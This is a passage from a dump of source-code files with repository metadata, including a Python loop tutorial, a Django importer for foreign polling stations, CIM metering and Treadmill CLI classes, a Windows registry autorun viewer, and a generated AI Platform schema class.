] | permissive | prataprc/gist | 70c2534079efb97cafd7bf58f1df4bb4284d13d1 | 4814ee6600d9f33dd940e4b3b9a98a0764a03bb5 | refs/heads/master | 2021-04-12T05:38:48.153925 | 2020-12-07T15:06:24 | 2020-12-07T15:06:24 | 32,151,350 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | #! /usr/bin/python
# Some examples using the looping constructs in python
a = ['cat', 'dog', 'elephant']
x = 10
print type(x)
for x in a :
print x, type(x), len(x)
b = 'hello \n world'
for x in b :
print x, type(x), len(x)
# Dangerous iteration on a mutable sequence (list)
# for x in a :
# a.insert(1, x) # Dont do this !
# print a
# To acheive the above mentioned purpose do the following
for x in a[:] : # Now we taking a copy of the sequence
a.insert(0, x) # you can safely do this !
print a
# Using the range() function
for x in range(10,100,30) :
print x,
else
print "the loop normally exited"
| [
"prataprc@gmail.com"
] | prataprc@gmail.com |
c4e566e7859ca5d0c9129e87c6823acbc30ec828 | dd9e7df6b7dd915e749f537f490f62d38b7fa214 | /maintenance/management/commands/init_foreign_uiks.py | 4dc74e932e8ed0915027885c5da01ffad9782c2f | [] | no_license | mikpanko/elections_network | 383039b5310d006811f3638924bed41184bc2a64 | 6c14c79d9ec74c30d9998533ef73819f0e2e91bd | refs/heads/master | 2020-12-31T03:16:49.742384 | 2012-06-30T14:19:22 | 2012-06-30T14:19:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,174 | py | import os.path
from django.conf import settings
from django.core.management.base import BaseCommand
from scrapy.selector import HtmlXPathSelector
from grakon.utils import print_progress, read_url
FOREIGN_UIKS_URL = 'http://www.foreign-countries.vybory.izbirkom.ru/region/region/foreign-countries?action=show&root=1000085&tvd=100100032124923&vrn=100100031793505®ion=99&global=true&sub_region=99&prver=0&pronetvd=null&vibid=100100032124923&type=226'
class Command(BaseCommand):
    """Import foreign (out-of-country) UIK polling stations as Locations.

    Combines a local CSV (uik number, country id, name, address) with the
    central election commission page that carries per-UIK 'root' and 'tvd'
    URL parameters.
    """
    help = "Init foreign uiks"
    def handle(self, *args, **options):
        """Create one Location row per foreign UIK listed on the site."""
        # Imported inside the handler, presumably to avoid app-loading
        # order issues -- TODO confirm.
        from locations.models import FOREIGN_CODE, FOREIGN_NAME, Location
        # uik number -> {'tik': country location id, 'address': address},
        # loaded from the bundled CSV file.
        uiks = {}
        for line in open(os.path.join(settings.PROJECT_PATH, 'data', 'foreign_uiks.csv'), 'r'):
            uik_no, country_id, country_name, address = line.strip().split(',')
            uiks[uik_no] = {'tik': int(country_id), 'address': address}
        # Map country-location id -> Location for the foreign region.
        countries_by_id = dict((location.id, location) for location in Location.objects.exclude(region=None) \
            .filter(tik=None).filter(region_code=FOREIGN_CODE))
        foreign_countries = Location.objects.get(region=None, region_code=FOREIGN_CODE)
        i = 0
        # Each <option> in the page's 'gs' select is one UIK; its value URL
        # carries the 'root' and 'tvd' identifiers we need to store.
        for uik_option in HtmlXPathSelector(text=read_url(FOREIGN_UIKS_URL)) \
                .select("//select[@name='gs']//option"):
            # Option text starts with the 4-character UIK number.
            uik_no = uik_option.select("text()").extract()[0].strip()[:4]
            if uik_no not in uiks:
                print uik_no
                continue
            url = uik_option.select("@value").extract()[0]
            for param in url.split('?')[1].split('&'):
                param_name, param_value = param.split('=')
                if param_name in ('root', 'tvd'):
                    uiks[uik_no][param_name] = int(param_value)
            location = Location(region=foreign_countries, tik=countries_by_id[uiks[uik_no]['tik']],
                                name=uik_no, region_name=FOREIGN_NAME, region_code=FOREIGN_CODE,
                                address=uiks[uik_no]['address'], tvd=uiks[uik_no]['tvd'],
                                root=uiks[uik_no]['root'], data='{}')
            location.save()
            i += 1
            print_progress(i, 350)
| [
"sergkop@gmail.com"
] | sergkop@gmail.com |
6d9273b5b0345cc09ca089ba02ca5e9fd109dddc | 2d4380518d9c591b6b6c09ea51e28a34381fc80c | /CIM16/IEC61968/Metering/ComFunction.py | 5e3b93609661efbb5adef5b2bc8c60c312ecd3ea | [
"MIT"
] | permissive | fran-jo/PyCIM | 355e36ae14d1b64b01e752c5acd5395bf88cd949 | de942633d966bdf2bd76d680ecb20517fc873281 | refs/heads/master | 2021-01-20T03:00:41.186556 | 2017-09-19T14:15:33 | 2017-09-19T14:15:33 | 89,480,767 | 0 | 1 | null | 2017-04-26T12:57:44 | 2017-04-26T12:57:44 | null | UTF-8 | Python | false | false | 3,308 | py | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM16.IEC61968.Metering.EndDeviceFunction import EndDeviceFunction
class ComFunction(EndDeviceFunction):
    """Communication function of communication equipment or a device such
    as a meter.
    """

    def __init__(self, amrRouter='', amrAddress='', twoWay=False, *args, **kw_args):
        """Initialises a new 'ComFunction' instance.

        @param amrRouter: Communication ID (e.g. port number, serial number,
            data collector ID) of the parent device of this AMR module.
        @param amrAddress: Communication ID (e.g. serial number, IP address,
            telephone number) of the AMR module which serves this meter.
        @param twoWay: True when the AMR module can both send and receive
            messages; default False means the module can only send.
        """
        # ID of the parent device this AMR module routes through.
        self.amrRouter = amrRouter

        # ID of the AMR module itself.
        self.amrAddress = amrAddress

        # Whether two-way communication is supported.
        self.twoWay = twoWay

        super(ComFunction, self).__init__(*args, **kw_args)

    # Serialisation metadata; must stay in sync with the attributes above.
    _attrs = ["amrRouter", "amrAddress", "twoWay"]
    _attr_types = {"amrRouter": str, "amrAddress": str, "twoWay": bool}
    _defaults = {"amrRouter": '', "amrAddress": '', "twoWay": False}
    _enums = {}
    _refs = []
    _many_refs = []
| [
"fran_jo@hotmail.com"
] | fran_jo@hotmail.com |
f82ef33cd4738f58765f3bcd648b1aa0d96dccc1 | 7f0c02b3eef636cc382484dd8015207c35cc83a8 | /lib/python/treadmill/sproc/warpgate.py | 95edca71b68bbd55ec900b55895d40d054d10f07 | [
"Apache-2.0"
] | permissive | ceache/treadmill | 4efa69482dafb990978bfdcb54b24c16ca5d1147 | 26a1f667fe272ff1762a558acfd66963494020ca | refs/heads/master | 2021-01-12T12:44:13.474640 | 2019-08-20T23:22:37 | 2019-08-20T23:22:37 | 151,146,942 | 0 | 0 | Apache-2.0 | 2018-10-01T19:31:51 | 2018-10-01T19:31:51 | null | UTF-8 | Python | false | false | 1,587 | py | """Warpgate client CLI.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import click
from treadmill import cli
from treadmill.warpgate import client
_LOGGER = logging.getLogger(__name__)
def init():
    """Top level command handler.

    Builds and returns the click command that runs the warpgate
    connection manager.
    """
    @click.command()
    @click.option('--policy-servers', type=cli.LIST,
                  required=True,
                  help='Warpgate policy servers')
    @click.option('--service-principal', type=str,
                  default='host',
                  help='Warpgate service principal.')
    @click.option('--policy', type=str, required=True,
                  envvar='WARPGATE_POLICY',
                  # Fixed help-text typo: 'Warpget' -> 'Warpgate'.
                  help='Warpgate policy to use')
    @click.option('--tun-dev', type=str, required=True,
                  help='Device to use when establishing tunnels.')
    @click.option('--tun-addr', type=str, required=False,
                  help='Local IP address to use when establishing tunnels.')
    def warpgate(policy_servers, service_principal, policy, tun_dev, tun_addr):
        """Run warpgate connection manager.
        """
        _LOGGER.info(
            'Launch client => %s, tunnel: %s[%s], policy: %s, principal: %s',
            policy_servers,
            tun_dev, tun_addr,
            policy,
            service_principal,
        )
        # Never exits
        client.run_client(
            policy_servers, service_principal, policy,
            tun_dev, tun_addr
        )
    return warpgate
| [
"ceache@users.noreply.github.com"
] | ceache@users.noreply.github.com |
78b511df1413545c20fdc14e03b3e4029917fce7 | 492d3e666b87eff971628a74fe13facde01e2949 | /htmlcov/_python_Django_My Projects_student-portal_Lib_site-packages_django___init___py.html.py | e61033f22d45a3153fac5dd081bb80af1fa7fa18 | [] | no_license | OmarFateh/Student-Portal | 42050da15327aa01944dc79b5e00ca34deb51531 | 167ffd3a4183529c0cbc5db4ab232026711ea915 | refs/heads/master | 2023-06-13T01:03:16.475588 | 2021-07-08T11:09:09 | 2021-07-08T11:09:09 | 382,895,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,063 | py | XXXXXXXXX XXXXX
XXXXXX
XXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXX
XXXXX XXXXXXXXXX XXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXX
XXXXX XXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX
XXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XXX XXXXXXXXXXXXXX
XX XXXXXXXXXX XXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXX XXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXXX XXXXXXXXXXXXXXXXX
XXXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XX XXXXXXXXXXXXXXXXXXXXXXX XX XXXX XXXXXXXX
XXXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXXX XXXXXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXXXXX XXXXXXXXXXX XXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXX XX XXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXX XXXXX XXXXXXXXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXX XXX XXXXXXXX XXXXX XXXXXXX XX X XXXX XXXXXX XX XXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXX XXXXXXXXX XXXXXXXXX XXXXXXX XXX XXXXXXXX XXX XXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXX XXX XXXXXXXXXXXX XXXXXXXXXXXX XXXXXX XXXXXX XX XXXXXXXXXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXX
XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXX XXXXXX XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX
XXXXXXX XX XXXXXXXXXX XXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXXXXX
XXXXXXX
| [
"66747309+OmarFateh@users.noreply.github.com"
] | 66747309+OmarFateh@users.noreply.github.com |
2b4389ecb7063df9de2c1a85552f21e19513c7d6 | da99b8e2a22318f1cafb0c78adb17c8fdebe01df | /PythonBookAdditional/第12章 Windows系统编程/code/CheckAndViewAutoRunsInSystem.py | 63a8ea52863a56fe57da939232caf9e2e9061c8b | [
"MIT"
] | permissive | lsjsss/PythonClass | f185873113d54ed6ae9b3ccc22cc5a71bf8f611d | 0d38d2ca4d14d5e0e2062e22ae2dbbefea279179 | refs/heads/master | 2023-02-18T13:43:32.453478 | 2023-02-08T07:17:09 | 2023-02-08T07:17:09 | 247,711,629 | 0 | 0 | null | 2022-04-25T07:03:53 | 2020-03-16T13:38:15 | Python | UTF-8 | Python | false | false | 1,579 | py | #check and view autoruns in the system
from win32api import *
from win32con import *
def GetValues(fullname):
    """Print every value name/data pair stored under a registry key.

    fullname is a full registry path such as
    'HKEY_LOCAL_MACHINE\\SOFTWARE\\...\\Run' (hive name, backslash, subkey).
    Prints an error for unknown hive names; other failures are reported
    without raising.
    """
    name=str.split(fullname,'\\',1)
    # Map the textual hive name to the win32con handle constant.
    # Fixed: the hive is HKEY_CLASSES_ROOT -- 'HKEY_CURRENT_ROOT' does not
    # exist, so the old branch raised a NameError that the broad except
    # silently swallowed.
    hives = {
        'HKEY_LOCAL_MACHINE': HKEY_LOCAL_MACHINE,
        'HKEY_CURRENT_USER': HKEY_CURRENT_USER,
        'HKEY_CLASSES_ROOT': HKEY_CLASSES_ROOT,
        'HKEY_CURRENT_CONFIG': HKEY_CURRENT_CONFIG,
        'HKEY_USERS': HKEY_USERS,
    }
    if name[0] not in hives:
        # Fixed: return after reporting; the old code fell through and used
        # an undefined 'key' variable.
        print('Error, no key named ',name[0])
        return
    try:
        key=RegOpenKey(hives[name[0]],name[1],0,KEY_READ)
        # RegQueryInfoKey()[1] is the number of values under the key.
        info = RegQueryInfoKey(key)
        for i in range(0,info[1]):
            ValueName = RegEnumValue(key,i)
            print(str.ljust(ValueName[0],20),ValueName[1])
        RegCloseKey(key)
    except Exception as e:
        # Narrowed from BaseException so Ctrl-C is not swallowed.
        print('Sth is wrong')
        print(e)
if __name__=='__main__':
    # Well-known registry locations listing programs that start
    # automatically at user logon; inspect each one.
    KeyNames=['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run',
              'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce',
              'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx',
              'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
              'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce']
    for KeyName in KeyNames:
        print(KeyName)
        GetValues(KeyName)
| [
"lsjsss@live.cn"
] | lsjsss@live.cn |
6e2dd713422373ca3f97052be06e0a16981f04f9 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/cloud/aiplatform/v1/aiplatform-v1-py/google/cloud/aiplatform/v1/schema/predict/instance_v1/types/video_classification.py | 2a302fc41f2bfb1ed6a3bebcbc1e33f705293c69 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.cloud.aiplatform.v1.schema.predict.instance',
manifest={
'VideoClassificationPredictionInstance',
},
)
class VideoClassificationPredictionInstance(proto.Message):
    r"""Prediction input format for Video Classification.

    Attributes:
        content (str):
            Google Cloud Storage location of the video on which to
            perform the prediction.
        mime_type (str):
            MIME type of the video; only video/mp4, video/avi and
            video/quicktime are supported.
        time_segment_start (str):
            Inclusive start of the video's time segment to classify,
            expressed in seconds from the start of the video with an
            "s" suffix; fractions allowed up to microsecond precision.
        time_segment_end (str):
            Exclusive end of the time segment, in the same format;
